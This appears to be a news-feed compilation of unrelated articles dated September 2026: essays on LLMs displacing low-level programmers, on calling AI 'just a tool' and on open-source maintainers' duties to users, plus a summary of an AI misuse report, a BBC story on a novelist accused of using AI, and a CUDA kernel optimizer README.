A photograph of a retro light-cyan-on-black screen. On the background, htop lists processes, like Xorg, init, and kthread. On the foreground, a retro-style terminal window is shown running commands like 'whoami', 'login -n root', and 'bin/history', with the history containing common shell commands like 'make', './configure', 'cat /proc/meminfo', etc. The commands mention a laser and a file called last_will_and_testament.txt, enacting technopunk vibes.

10 year old me needed to know what these lines meant, and so I began the grueling job of learning programming. I didn’t care about practicality, building useful programs, or writing code per se: all I wanted is to understand how the machine works . It took several years of learning and maining Linux until I figured it out, but I got there.

Later, I tried specializing in different areas, like networking, cryptography, or Rust, but I always found myself gravitating towards the machine itself. I learned to appreciate it and respect its wishes. I found joy in writing a toy OS, counting cycles, and writing machine code by hand. I took pride in inventing clever hacks. Like a fisherman might feel one with a fishing rod, I treat the machine as a continuation of myself.

I’ve been doing this for eight years now, and I’m way in over my head. I hesitate to switch CPUs because I don’t understand ARM64 as well as I understand x86, and that genuinely gives me discomfort. I worry about allocations in Python code. I’m deeply concerned about not knowing how to look at JIT disassembly of Java code running on my PC. Today I found an annotated version of The Story of Mel and caught myself thinking, who could possibly need “hexadecimal” explained?


I don’t see myself as a programmer who is also an expert in a niche area; I see myself as exclusively a low-level coder, or even just a detail-oriented person. I can make a website if I have to, but I can’t work on it for a month straight the way I can on low-level software – but I can very much research physics the same way.

My focus on details doesn’t end on technology. I can’t learn topics top-down or deal with absent information. When someone explains a concept to me, I need to reinvent it myself from scratch until I “get it”. In school, I would spend hours adjusting axioms for my intuition until they fit, and then building theorems on top of them every time I needed to use them, until they, too, became intuitive. (Hell, my and my girlfriend’s quality time is often proving theorems.) Closer to reality, I can’t experiment with cooking without understanding the underlying chemistry. Generally speaking, I can’t use something I don’t understand completely – if it doesn’t click, I can’t work with it.

This is genuinely debilitating in day-to-day activities, but for a while, the software world was the one reprieve I had from this struggle.

Even those who didn’t get would at least respect my work on low-level projects. There was an understanding that minor optimizations in compilers compound, that someone needs to write assembly for JSON parsers to go brrr, and that programs don’t have to suck the way Electron slop does. Maybe it wasn’t the central part of software development, but it was important enough that investing some time in it was considered worthwhile. In other cases, I built reputation by knowing stuff, the way I could glance at people’s issues and know what went wrong.


That lasted until powerful LLMs came out. The overwhelming consensus across the industry is that LLMs will make such a draining and exhausting process as “worrying about details” obsolete, and let developers focus on abstractions and large projects. Great for them, but I’m not exaggerating when I say they took everything from me.

If anyone can point an LLM at slow code and it automatically finds a hot loop and uses a trick it found somewhere on the 'net to vectorize it, there is little point in hiring someone with a focus on that. If an LLM can analyze the code and explain pointer provenance to you and babysit you until you get it, there is little value in expertise.

I cannot use LLMs this way. I get almost physically ill when I work on a project with more source code files or at least general architecture than I can keep in my head, so I don’t get anything out of expanded scope.

Last time I tried using an LLM for a pet project, I realized that the LLM would come to know more about it than pretty much any person I could show it to. I can be content with being a misunderstood genius, or whatever – but being not just deemed unworthy of human interaction, but effectively shown the door and redirected to an LLM is beyond insulting. I swore not to use LLMs for anything I care about since then.

Over the course of a year, I went from having a planned future to worrying about applying for disability. LLM-driven development optimized out every part that makes programming bearable for me, the job market decided it’s the future, and now that the one option in my life I thought constant disappeared, it turns out there there was never a decent alternative.


That’s where I stand for now. Aside from big tech, which is greeting LLMs with wide arms, few companies have resources to care about the type of work I do. Linux had a chance to be an exception, but oh well. Hobbies still exist, but they don’t pay the bills, and increasingly retrocomputing and performance optimization are being infested by LLM fans that seek recognition rather than the experience, which sucks the fun out.

AI is not “just a tool”

Lobsters
brettcodes.com
2026-09-25 07:12:22
Comments...
Original Article

I am sick and tired of people saying that “AI is just a tool” because it is quite simply wrong. Framing the technology of LLMs as “just a tool” is meaningless and justifies nothing. It’s a pithy phrase people use to either trivialize a thing that’s much more complicated or to excuse their use of dangerous products made by irresponsible companies.

Software developers are very fond of saying “well, it’s just a tool, it’s how you use it.” It’s a rote argument used to extricate themselves from the very real complicated aspects surrounding the technology of LLMs. I see it repeated in tech organizing spaces, in the justification of LLM-generated code in the Linux kernel, in articles by journalists, and on and on.

AI is not just a tool. AI is an industry led by psychos. AI is LLMs. AI is agents. AI is the massive expansion of data centers. AI is shitty features crammed into software that doesn’t need it. AI is a product. 1

AI, in the current reckless ways those two letters are used, means far more than something that's "just a tool."

▶ Listen to a narrated version of this post on YouTube.

Let’s say you use a coding harness hooked up to a chatbot API to write code. That’s not just a tool. It’s a product you pay for. The model you use today will be retired. The cost of all of this will go up because the token are subsidized and the companies aren't focused on turning a profit yet. The companies that build these products are either themselves or rely upon other companies that are led by irresponsible people saying unhinged things to increase their market valuation, keep their staff from leaving, and to build their own ego. That’s not “just a tool.”

Sure, you could run a local LLM model on your computer and use it to generate some SQL to help you create a report. Or generate awful art for your D&D campaign with your friends. But who made that model? Who trained it? Where did the data come from? How much did it cost in compute and environmental resources? What are the motivations behind the company making it?

Let me tell you what a tool is, since many seem to have forgotten. A tool is something that people make or fashion or adapt to accomplish specific tasks.

A power drill is a tool, almost even “just a tool.” Yes, engineering and manufacturing and resource extraction went into making it. And the power drill is more capable than a hand drill. The technology of motors and batteries and plastic molding all come together to make it easier for someone to bore a hole into another material. While the power drill is also a product and there’s an industry that exists to manufacture these tools, the leaders of these companies are NOT talking about how power drills and hammers and levels have a greater than 10% chance of wiping out humanity. Using a power drill does not have the potential to stunt the learning of critical skills by carpenters that use them.

My power drill does not “sometimes make mistakes” and accidentally rotate in the wrong direction. If it did, I’d consider it broken. I would try to fix it and if that wasn’t possible, I would stop using it. It would be considered defective. 2

Emacs is a just tool. Vim is a just tool. These are pieces of software made by people to accomplish specific tasks—editing text. They are not industries or even companies. They don’t require massive amounts of resources to use or even create. They are not inherently dangerous. Sure, one could use Vim to write a computer virus. But that's the application of the tool, not a problem with the tool itself. If I launch Vim and type "try to hack into this server" into my buffer, it won't commit a cybercrime. It's absurd to talk about long-time-horizon coding harnesses hooked up probabilistic LLM APIs as "just a tool."

When people trivialize what AI is by saying it's “just a tool” they are abdicating responsibility for the use of a technology that is being handled in a dangerous and irresponsible way. By using the various AI products, it's showing demand for something that we as a society haven't even begun to scratch the surface of its harms and so far see very little of its benefits (making software faster and creating awful presentations are hardly major benefits to society). The leaders of these AI companies continue to say unhinged things causing mass anxiety. We must stop perpetuating this “just a tool” rhetoric that helps enable the continued behavior of these companies and their leaders.

So please stop saying that “AI is just a tool” because that couldn’t be further from the truth and causes far more harm than good. It justifies nothing. It means nothing. It helps no one. When you find yourself about to say it, just don't say it. When you type it out, delete that sentence. You’ll sound a bit less foolish.


Show your support by joining my YouTube channel or buying me a coffee . Thank you for reading!


  1. AI is not really most of those these things. AI is a much broader capability and field applied in all sorts of ways. Unfortunately, generative AI with LLMs has co-opted the term in the public consciousness. For most of my life, AI meant the behavior of non-player entities in video games. These two letters mean a lot of things right now and the unspecific use of them is also contributing to the problem. ↩

  2. Which is not to say that something being probabilistic invalidates it from being a tool. But I do think the probabilistic nature of LLMs is not intentional and makes it more complicated. ↩

#anti-ai #video

On Anthropic’s AI Misuse Report

Schneier
www.schneier.com
2026-09-25 07:07:22
Earlier this month, Anthropic published a long report detailing all of the Claude misuses it detected. Daniel Meissler usefully summarized the report into 117 findings. A few of the highlights: AI agents increasingly handled reconnaissance, exploitation, data theft, propaganda production, surveilla...
Original Article

Earlier this month, Anthropic published a long report detailing all of the Claude misuses it detected. Daniel Meissler usefully summarized the report into 117 findings.

A few of the highlights:

  • AI agents increasingly handled reconnaissance, exploitation, data theft, propaganda production, surveillance workflows, and research while humans selected targets, set goals, and reviewed important outputs.
  • The report describes attackers using AI to industrialize credential theft, cloud compromise, phishing, vulnerability research, and the extraction of sensitive data from downstream organizations.
  • Influence operations used persistent agent memory, fake news sites, fabricated journalists, synthetic personas, political profiling, and large-scale multilingual content, although high content volume often produced little genuine engagement.
  • Surveillance and repression cases included automated dossiers, biometric and communications analysis, transnational targeting, coercive recruitment, and systems that continued operating locally after model access was revoked.
  • Biological and weapons cases show dual-use risk: AI supported advanced scientific and military work, but the report generally doesn’t establish completed biological weapons or operational battlefield deployment.

Tags: ,

Posted on September 25, 2026 at 7:07 AM • 1 Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.

Who Is Open Source About?

Lobsters
blog.glyph.im
2026-09-25 06:57:30
Comments...
Original Article

Open source is, at least in part, about you , where “you” refers to the user.

Open Source Is Not About “Open Source Is Not About You”

In other words: Rich Hickey was wrong when he wrote “Open Source Is Not About You” and I’m tired of pretending otherwise.

Of course he’s not completely wrong, or his famous post would not have resonated quite so much in the first place. Obnoxious users who demand their personal use-cases be immediately addressed by volunteer maintainers for free should indeed be viewed as the pariahs that they are. Similarly, corporate users who want free support from the community that supplies their infrastructure to lower their costs. As should those who profit from this type of externalization by their own customers.

But the exchange of “open source” (or even “free software”) is not as simple as “I have prepared some software for you, please enjoy it, you have no right to complain”, and maintainers ought to have a precise understanding of the costs and benefits — as well as the ethical implications — of that exchange.

Right now we barely even articulate that the exchange exists , let alone that it establishes a long-term, subtle, and implicit relationship between maintainer and user.

Let’s fix that.

A Brief Aside about Meta-Ethics

When we talk about “obligations” and “rights”, of “shoulds” and “musts”, we are constructing an ethical system. The purpose of such a system is to develop social expectations and social consequences. There is not much use in me telling you that you are transcendentally evil for failing to follow some arbitrary recommendation that I have. But I am implying that I believe there should be consequences for your behavior. I am also implying that there probably already are some consequences, and they’re just not written down anywhere yet.

Therefore, a post like this, where I say that we should view our social obligations in a certain way, that is the beginning of a broader social conversation. I think there should be some consequences, so I am gesturing towards that possibility. Exactly what consequences?

For now, I’m not sure. Let’s figure it out.

What Are We Doing When We Do An Open Source?

Hickey, and his many acolytes in the years since his fateful post, asserts that the process of “open source” goes like this:

  1. Maintainer makes a thing, and makes it available to users as a gift.
    1. Maintainer may “love working with the team”.
    2. Maintainer may be “proud of the work we do”.
  2. Users accept the gift, and extract utility from it.
    1. (Users MUST be grateful for this.)
  3. A tiny fraction of users reciprocally contribute to the thing.
    1. (Maintainers may be grateful for this.)

He makes various oblique references to the specific activities of his company, which does things vaguely related to his projects for money 1 . These activities are exclusively characterized as for “customers”, however, a subset of the aforementioned users so tiny (“fewer than 1%”) as to nearly be an entirely distinct group.

Breezing past this process in an essay about obnoxious users demanding things they are not entitled to, one might nod along, as this sounds mostly sensible. Giving gifts is nice. I too love working with good teams and taking pride in things.

Examined more closely, however, it starts to logically fall apart. If you have consulting clients and that’s where all of your money is coming from, why are you bothering (as he repeatedly insists) “doing [things] for the community”? What was the point of releasing this code in the first place? You could love working with your team and be proud of the work that you do in a lot of different contexts; why bother implicating this horde of entitled and obnoxious people, if that’s all you’re getting out of it? What’s in it for you?

If we’ve left out something as fundamental as “why is the maintainer doing this”, perhaps this story leaves out some other important bits as well.

Why Are You Doing This?

There are many possible motivations for releasing and maintaining open source software. They are often subtle, often overlapping, and rarely clearly stated. Maintainers are not a monolith and not everyone does it for similar reasons. But let’s review a few reasons that someone might want to contribute.

Reputation

One reason that you might want to release some open source software is advertising . The most common form of this is self-promotion; if you are a visible, prominent contributor to an open source project, it stands to reason that you will have an easier time finding work in the domain of that project.

If you operate a consultancy, as Rich Hickey did at the time of his famous rant, then this reputational currency translates into advertising for your services. It’s a practical demonstration of the skills of your team.

The trade in this benefit is most like the traditional “gift economy” that open source has been compared to. You give the code to your users, which has some value, but the users give you back some reputation, in the form of their attention, their esteem, and possibly even their money if they become customers or employers.

Influence

Infrastructure is the most popular type of open source for a good reason. Programmers working on a problem are often hemmed in by sclerotic architectural choices which prevent them from solving problems in the way that they’d prefer to solve them. Major infrastructural investments are difficult to justify in a planning process, as their benefits are hard to prove. Sometimes the benefits are highly personal; different engineers have different aesthetic preferences about what types of equally-valid solutions they’d prefer to work with.

If you can develop your preferred type of solution and release it as open source, then you can influence how everyone else solves this type of problem. As an individual, such a position of influence can allow you to have some transferable expertise between employers. You know how to use the tool you developed, so you can be very quick and effective with it, and you can shape it to your ongoing taste over time.

If you’re an employer, and you can get everyone else to use your open source thing 2 , this can reduce both your hiring and training costs. Potential employees can read the code, see that it’s good, and want to work at a place that produces good code like that. They can also read the code and become familiar with it in advance of coming to work for you, which means that you have a ready supply of developers who already know how your internal systems work.

The trade in this benefit is more like “soft power” than a gift economy. You give the code to your users, which has some value, but the users give you back the ability to dictate their technological agenda. You gain both the ability to influence their initial direction, and, as part of ongoing maintenance, to dictate their behavior over time.

Improvement

As an engineer, you might want to improve your own skills. Writing something proprietary and commercial cuts against this in two ways.

First, you will want to build something that already exists within your skill set, so that it will attract commercial interest and actually be competitive. Within the context of a larger team, you will want to personally be able to be immediately effective for similar reasons. But you still need a way to learn new things.

Second, you will want to build something somewhat secretively, so that the value you are producing is captured rather than released to the community. This means that you will be cut off from external sources of expert feedback.

As an organization, you might want to build the skills of your staff in similar ways.

The trade in this benefit is code for knowledge. You release the code or changes, and in return you expect your users to provide you good bug reports, and to induce at least some of them to become co-developers.

Outsourcing

As an engineer, you can only do so much on your own. Perhaps you want to have some influence over your infrastructure so you want to write it, but you also want to have a communal place to keep your infrastructure such that you can make a change to something to suit your needs, but you know that even if you walk away, someone else will maintain that change and keep it working across years or even decades of changes to underlying platforms, hardware, etc.

This sort of communal maintenance effort can be shared among all interested participants; if a thousand companies all need the same tool, if even a few dozen can share it, that reduces even their own load massively, let alone everyone else’s.

The trade in this benefit is more complex, since there’s less symmetry between the main maintainer and peripheral community members who also contribute code. The main maintainer is actually trading a namespace , a central place for people to contribute, coordinate, and release changes, rather than the code . They are a sort of market maker where then all the other contributors trade code for code within that market-ish structure.

In practice, this motivation produces a game theory problem where, when maintenance drops below a critical threshold, it creates a big enough crisis that at least some freeloading stakeholders will be forced to start making contributions.

Ultimately, however, this saves all involved parties a ton on maintenance, more eager volunteers who do not freeload in the first place get all the other benefits mentioned above as well.

A Brief Aside about your Chart of Accounts

Most companies account for open source maintenance work as simple overhead on ongoing projects. Sometimes it’s CapEx, sometimes it’s OpEx, but it’s just “whoever happens to be working on this thing to support whatever random product it’s a part of”.

This type of accounting creates distorting incentives, because it doesn’t recognize all the benefits above. Under such a fiscal regime, ongoing healthy maintenance becomes a ZIRP because when resources are more constrained, this apparent indulgence gets corrected.

The ancillary benefits that open source creates ought to be properly recognized. It shouldn’t just be buried as Wages or IT or whatever. If it’s helping you hire better engineers, some of that expense should be allocated to Recruitment Costs. If it’s materially improving your reputation among your customer base, some of it should go to Goodwill. If it’s getting your product in front of developers who are your customers, it should be in Marketing. Most importantly, if maintenance on an open source project is actually helping you maintain your enterprise-wide platform, it should not be squirreled away in some small team who happened to be the first one to adopt it. 3

Exactly how these costs should be allocated and cross-charged to different departments depends heavily upon your organization and your specific chart of accounts. But “whatever, it’s just part of the software product” or “I guess it’s DevRel because the SDK is in there” is guaranteed to have your open source organization destroyed along with all those side-benefits the next time that there’s a cash crunch .

The Things that Aren’t Supposed To Be Benefits

These categories could be made as explicit, rational trade-offs, even if they are often implicit and subtle in practice. They are transactions where the maintainer gets something and the user gets something.

However, not everything that you are getting as a maintainer is something you are actually supposed to use to your own benefit. Being given trust in service of a responsibility is not a transaction.

“Oops, All Root Shells”

Open source code is code . In our modern world of absolutely pathetic sandboxing , installing code from somebody else gives them control over your system, even if it is somewhat indirect.

There is an unwritten rule that if I create an open source library, and you use it, it probably shouldn’t have a backdoor in it that gives me the credentials to your bank account. There is a trust relationship between the user and the maintainer, and here, we see the first obligation that the maintainer has. The maintainer is obligated not to use the user’s computer for their own gain .

This rule might seem obvious and straightforward. It might even seem unfair to you that I call the rule “unwritten”, because the rule is , in fact, written down in a few places: for example, in the npm Acceptable Content Policy , it says right there:

A few examples of unacceptable content:

…

  1. Content containing malicious computer code, such as computer viruses, computer worms, rootkits, back doors, or spyware. This includes content submitted for research purposes. Tools designed and documented explicitly to assist in security research are acceptable, but exploits and malware that use the npm registry as a deployment or delivery vector are not.

I think we can all agree that a script which steals your bank credentials and sends them to me to buy a totally sick jet ski would qualify as “malware”, so clearly that is forbidden.

There is also an enormous gray area here. npm also explicitly allows “Information on how to pay, donate to, and otherwise support Package development”, but then goes on to explicitly forbid “Packages that display ads at runtime, on installation, or at other stages of the software development lifecycle, such as via npm scripts.” 4 How are the lines drawn around these gray areas? “npm will continue to apply its judgment when deciding what content is acceptable.”

But also... this is forbidden by npm , not by the transcendental nature of “open source”. I could give away code that displays all kinds of ads to its users as a “gift” on my website. The exact structure of this policy is not uncommon, but it also isn’t exactly the same as other such sites. PyPI, for example , explicitly bans “cryptocurrency mining”, which NPM does not. Is cryptocurrency mining “not open source”? A lot of judgement calls are happening here about what is allowable in these “gifts” that you are giving to your users.

But I digress.

My point is that policy-making around this concept is not clear, there are lots of little disagreements around the edges, but there is a very strong consensus that while the user is giving you their trust here, that is not a trade . The deal is not “you give the user some code, the user gives you unlimited compute and access to all their financial accounts”. The user has made themselves vulnerable to your code on the strength of your reputation.

This creates an obligation for you to not do anything evil with that code, either intentionally or through negligence.

Security Updates Are Just Command And Control In A Funny Hat

All of this is just about the initial download of some code, and that is the way that Rich Hickey describes it, as if you just grabbed some code off a web page and put it in a folder that you like on your desktop. But that is not how open source relationships work today, if indeed it ever was.

The way it works today is that you add a dependency to your pyproject.toml or your package.json or your Cargo.toml and now your users are vulnerable not just to whatever you happened to upload in the first place, but to whoever happens to have your package index credentials .

This creates an obligation to maintain an operational security posture that protects your users from malicious updates.

The Roadmap Is Someone’s Life

Another kind of trust that the user is placing in you is the trust that you are going to have at least some kind of regard for their usage of your software.

In a perfect world, the user’s expectations could be clearly circumscribed. Whatever ongoing maintenance you commit to perform would be encapsulated in clear policies that you’d write up in advance, about exactly what kind of security response policy you have, how you will communicate when you no longer have the resources for maintenance, and so on.

But anyone who has been involved in any project at anything but the most extreme tier of operational maturity knows that 99% of the ecosystem relies on a set of loose conventions around how all that stuff works. We expect that maintainers will generally be around, that they’ll use existing tools like an issue tracker for triaging user bugs, GHSA and CVEs for security reporting, that they will mark the project as “archived” and maybe do a final release before abandoning it, that they will maintain a ChangeLog explaining at least a little bit of what is going on.

Users assume that those conventions will be followed when there are any gaps in explicit policy, or indeed if policy is lacking entirely. This assumption is reasonable, because otherwise nobody could ever use any open source without a stack of service contracts that nobody has any time to write.

The strongest such convention is that an actively maintained program will, at least, more or less keep doing what it does as time goes on. A user who has elected to use a bit of open source software has made themselves vulnerable to changes and breakages in that software by the mere fact of using it. In the time that they have used it and invested in it, they have not invested in:

  • creating alternative software to meet their needs,
  • maintaining data in formats that other software can read, or
  • learning how to use existing alternative software.

This can, and does, go badly wrong, when those expectations are mismatched.

How It Goes Wrong

Let’s say a maintainer creates an open source paint program, OpenPaint.

An artist, known for their unique style of making blended collages, switches from their previous app, ProprietaryPaint, to this new OpenPaint to make these culturally significant works of art. However, the maintainer decides that the ‘blend’ tool is kind of a pain to maintain, and they remove it in OpenPaint 2.

A few months later, the artist’s operating system vendor issues a security update that breaks OpenPaint, because older versions of OpenPaint were unknowingly abusing some platform API.

The maintainer releases a new OpenPaint 2.0.1 that addresses this incompatibility, but doesn’t care about version 1.x any more so they don’t bother to update that one.

This places the artist in an impossible situation. They can stay on an old version of their operating system, putting all their personal data at risk. Or they can upgrade to the new operating system, effectively either cutting off access to their livelihood, or forcing them to change their art style entirely.

Now, proprietary software can place users in similarly untenable positions (and in fact, it is more often proprietary software that does). But does the openness completely remove any obligation for this consideration? Should the OpenPaint team have to at least communicate the reasons for doing this, to give the artist some recourse? 5

The only thing that “open source” does is that it allows the artist to pay a prohibitive amount of money to a new maintenance team to create a fork. This is rarely the kind of thing that individuals can manage.

This creates an obligation to at least consider how your users might be relying on you .

This is the most complex obligation of the bunch. Obviously it does not entitle every single user to infinite work from the maintainer, but it also shouldn’t entitle the user to nothing for having trusted these subtle implied claims that the maintainer is making by making their work public.

It is a nuanced and ongoing negotiation and I do not think we have a clear moral intuition about how it should work out. But we do need to figure out a way to work it out.

It also raises a clarifying question.

Why Are We Even Doing This, and Who Are We Doing It For?

People generally like to do things for more than one reason. We live in an economy where people need to make money, but we mostly prefer to make that money doing things that are useful, and that make other people happy.

So, yes, we create open source for self-interested reasons to improve our reputations, to improve our skills, to increase our influence and to share our maintenance burdens. In so doing we take on some level of obligation to not abuse the trust that is placed in us, even if that level of obligation is not clear.

But if we are not doing it to serve those users at least a little bit, then those motivations are going to quickly ring hollow. We will not increase our reputation with a person if we respond to their every request by telling them that we owe them nothing and that their opinions are worthless. We will not gain influence over a community if we ignore their desires.

Many interactions with open source maintainers are unnecessarily adversarial. This is of course partially the fault of those users, who should calibrate their expectations appropriately.

Still: maintainers could do a better job of listening before these interactions become toxic. There’s no reason that “open source users” should be an especially toxic group of people. At this point in history, that group is basically just … people with computers.

It’s like that old truism. If you meet one person who is a jerk to you, that’s their problem. But if everyone you meet, everywhere you go, is constantly abrasive to you and treats you like you’re doing something wrong, maybe it’s time to look inward.

If all open source users are entitled assholes, maybe it’s time to look for a structural problem.

Surprise, It’s About AI Again

Sigh. 6

Users hate slop.

I know, dear AI-positive reader, your AI outputs are different from everyone else’s, you aren’t pushing thoughtless slop into your code, just because everyone else is and it is the inevitable terminus of using those tools. You aren’t “lazy vibe coding” with Claude, you’re doing “responsible agentic engineering”, which is different because you’re just built different.

Still, humor me, for a moment. Your users don’t know that. They know what it looks like when products that they like adopt slop. They know that they will start leaking data . Developers know that it will make them personally less secure . They know that they can expect more outages and that your code will inexorably decline in quality .

In other words, your users are going to assume that this means you are violating that final obligation that the software should keep working .

Your users are going to tell you to stop, and they are probably going to get mad. Maybe you, or a plurality of your team, also want to stop, maybe you disagree with them, but in any case you need some way to have that conversation in a way that does not immediately overflow into every adjacent discussion forum. Users need to feel welcome in some space so they can have the discussion in that space, and not explode out into a thousand different group chats and social media threads.

This post was inspired by yet another prominent open source community discourse where a ton of angry users showed up to yell at developers to stop accepting LLM-generated code. I’m not going to link to any of these, because we don’t need any more fuel for the discourse fire. But there is more than one such case and the pattern is becoming familiar.

On social media - usually BlueSky or Mastodon, but sometimes a user group forum - users become aware of some AI-adjacent policy. They show up in a horde to the developer forum or mailing list. They loudly start demanding the project take a hard stand 7 against AI. This pressure is simultaneous, but uncoordinated; extremely repetitive, very diverse, often inconsistent, and pretty stressful, especially if you’re a burnt-out maintainer with other things to be doing who may not even like AI yourself in the first place.

Believe me, I get it. It can be very unpleasant to deal with.

Like most problems that AI is causing, though, it’s not really an “AI” problem as much as it is a pre-existing dumpster fire that “AI” is pouring gasoline onto. In this case, an online mob is the language of the unheard 8 .

If Users Are Mad It’s Probably Already Too Late (But Maybe You Can Get Ready For Next Time)

One day, all of a sudden, you’re getting feedback from a bunch of users that are using inappropriate channels to complain. But did they already have appropriate channels to use?

Did you have a place for people to congregate and discuss your project? To make orderly complaints in a way that will be legible to you? Or do you just have a GitHub Issues page, which non-technical users have no idea how to interact with, and a forum for developers, where users don’t know the norms and any arriving brigade of pissed-off users will be seen as disruptive and inappropriate?

I don’t want to be throwing any stones from within my particular glass house. Setting up such a place has gotten harder over the years. I don’t really have one, either.

Could I have one, though? IRC has been slowly dying, mailing lists are unpopular and present increasingly annoying moderation challenges, forum software is expensive to operate and keep maintained, Discord is a confusing mess and the upshot of all of this is every community needs community management and forum moderation. Which means that for my own small solo projects, I couldn’t possibly have such infrastructure because such infrastructure requires a dedicated second person to maintain it, and until someone volunteers for that, it’s not really feasible. Even for my larger projects you’d be surprised how slim of a skeleton crew we are getting by with, and we definitely don’t have a whole spare maintainer to go manage this, especially as we are under attack from the slopocalypse ourselves.

The nature of open source community is that most communities start too small to need such a thing, grow incrementally until one day they are suddenly way too big and needed one yesterday, and then suddenly they are too small again when interest wanes even a little bit. Even as we need it more and more, building and maintaining community infrastructure remains a challenge.

Even so, having a dedicated place for users — not maintainers — to converse amongst themselves, be an actual community, and present feedback to the developers, is fast becoming a necessary component of a successful community and not a nice-to-have.

In Conclusion

As trying as it can be sometimes, we maintainers all do get something out of open source, and it is good to be honest with your users — and with yourself — exactly what you want to get out of it. In order to know whether the juice is worth the squeeze , we must know both what the juice is, and what the squeeze is.

Part of the metaphorical squeeze is a set of obligations, and those are the most poorly defined of all. We should try to be clear about what those are too. Both about exactly what we believe we are signing up for, and also, about how we are willing to let our users hold us to account for them. Codes of conduct are a start here, but only the absolute barest bare minimum; “do not harass your colleagues or your users” is not a standard of excellence to aspire to, it’s just basic manners.

I can’t tell you exactly what your obligations are, only try to gesture at my idea of the outlines of the fuzzy moral intuition we’ve all been implicitly sharing up until now.

Drawing this line is not just for the benefit of the users, either. Maintainers already feel pressure, we already feel obligations. We resent that feeling of obligation. While there are a diverse array of reasons for that resentment, one big one is that it’s not clear, even to ourselves where the obligations end . Lashing out by saying “I promised nothing and I owe you nothing!” followed by some choice expletives feels cathartic, but it doesn’t really solve the problem, because we clearly don’t really believe that’s where the line is, or we would have already stopped there. We wouldn’t feel the need to say it.

It is going to be a very big collective endeavor to figure out exactly where that line is. The best time to have gotten started on that endeavor was 50 years ago.

But the second best time is today.

Acknowledgments

Thank you to my patrons who are supporting my writing on this blog. If you like what you’ve read here and you’d like to read more of it, or you’d like to support my various open-source endeavors , you can support my work as a sponsor ! 9

Uproar in France over award-winning author accused of using AI

Hacker News
www.bbc.com
2026-09-25 06:48:32
Comments...
Original Article

Uproar in France over award-winning author accused of using AI

Joel Saget / AFP via Getty Images Thélyson Orélien pictured in a studio setting wearing a blue shirt, with a neutral expression, and red background Joel Saget / AFP via Getty Images

Thélyson Orélien has denied allegations he used AI in his work

The French book scene is in uproar after a Canadian-Haitian author billed as a sensation was accused of using artificial intelligence (AI) to write his first novel.

Thélyson Orélien, 38, has just been awarded the Prix du Roman Fnac – the first of the literary season's prizes – for C'était ça ou mourir (It was either that or die).

He is also a finalist for the most prestigious annual French language awards, the Goncourt and the Renaudot, set to be issued soon.

But on Tuesday a little-known group called Balance ton Claude (Denounce your Claude, in reference to Anthropic's AI assistant) claimed the book was "almost totally" written by AI - a charge the author denied.

"We tested several passages, from different bits of the manuscript, to come up with the identical result: 100 percent AI," the group said on X.

According to the group – whose membership is unclear – the detection was carried out by a programme called Pangram, which it said was "by far the most accurate", with an almost negligible chance of making a mistake.

Orélien, who was born in Haiti and moved to Montreal in 2010, immediately denied the accusation.

"I have always loved creation and literature. I can't see why I would feel compelled to use a machine," he told Libération newspaper. He said he was "compiling a dossier" with his editor to prove that he authentically wrote the book.

"My traditions are Haitian and Caribbean. The images, the repetitions and the rhythms are the living word, they are my own," he said.

The publishing house Grasset also came to his defence, saying the allegations "are atrociously injurious to a writer with an exceptional life-story" whose "work of creation is original and powerful."

The novel tells the story of a teacher who flees gang violence in Haiti and his adventures before he finally makes it to Canada, where he re-discovers "the right to breathe without fear".

The row recalls the controversy over Trinidadian writer Jamir Nazir's The Serpent in the Grove, whose Commonwealth Short Story prize was initially withdrawn in July over allegations that it was written with generative AI.

The prize was subsequently re-awarded, after the organisers said they were satisfied the writing was genuine.

Critics of Pangram and other AI-detectors say they are unreliable – with different programmes often giving different results after analysing the same texts.

Reuters A book with a yellow cover and French writing sits on top of other books Reuters

Thélyson Orélien's book won the Prix du Roman Fnac this week

These tools do not actually know who, or what, wrote a piece of text. Instead, they look for patterns commonly found in AI-generated writing, but those patterns can also appear in human work.

Research has found that AI-detectors can wrongly flag human writing as AI-generated and miss text that was produced by artificial intelligence, particularly if it has been edited or paraphrased.

Some also say that the programmes are built around the use of standardised language - English or French - and so cannot accurately interpret texts that use dialect from places like the Caribbean.

But the writers behind Balance ton Claude said that Pangram had been shown to make a wrong call about an AI-generated text only one time in every 24,400.

The latest detectors no longer compare text with text, to see if there has been plagiarism. Instead they analyse probabilities and statistics, to see if certain linguistic patterns betray the use of AI.

With AI becoming increasingly normalised, the row over C'etait ça ou mourir will feed the debate over what mix of human and AI creativity is deemed acceptable – it being perfectly possible for writers to generate AI then adapt it, or conversely write an original text then ask AI to review it.

Orélien was born in 1988 in the northern Haitian city of Gonaives.

His first work – before leaving his homeland – consisted of mainly poetic texts, and later in Canada he worked as a journalist.

The novel, described by his Canadian publisher as its biggest seller in 60 years, is due to be translated into around 20 languages.

Orélien told Libération that the first draft of the book was written in 2019 – well before AI programmes to generate text became generally available.

Show HN: Agentic CUDA Kernel Optimizer

Hacker News
github.com
2026-09-25 06:32:58
Comments...
Original Article

CUDA Kernel Optimizer

Contents

An agentic CUDA kernel optimizer that turns workload descriptions into GPU implementations through an automated cycle of code generation, correctness checks, benchmarking, and refinement. Powered by LangGraph, the agent explores kernel implementations and launch configurations, queries GPU properties, and can research NVIDIA documentation for optimization guidance and inspect Nsight Compute counters to inform its next experiment. Each experiment is recorded, and the fastest validated implementation is retained.

The model can change both kernel code and per-case launch configurations. A standalone C++ harness compiles kernels with NVRTC, launches them through the CUDA Driver API, and saves outputs. Python handles comparison and candidate selection.

How it works

  1. Load or generate a signature, input cases, reference kernel, and initial kernel.
  2. Run the reference and evaluate the initial implementation.
  3. Propose a change, compile it, compare outputs with NumPy, and measure kernel latency.
  4. Feed results back into the next attempt; repair invalid candidates within the iteration budget.
  5. Save the fastest validated candidate, execution history, and a timing heatmap.

Every case must pass validation. Ranking uses the geometric mean of latency across performance cases; small correctness cases do not affect the score. Timing defaults to 10 warmup launches and 100 measured launches using CUDA events. Compilation time and profiler replay timings are excluded from ranking.

Setup

Developed on Windows with an RTX 3060 Laptop GPU. Requires Python 3.12+, an NVIDIA GPU and compatible CUDA Toolkit/driver, CMake 3.24+, a C++17 compiler, and an OpenAI API key. The build commands below use Visual Studio 2026 with the C++ tools installed.

From the repository root:

python -m venv .venv
.venv\Scripts\python -m pip install -r optimizer_agent/requirements.txt
cmake -S cuda_test_harness -B cuda_test_harness/build -DCMAKE_BUILD_TYPE=Release
cmake --build cuda_test_harness/build --parallel

Create a .env file in the repository root:

OPENAI_API_KEY=your-key-here

Run

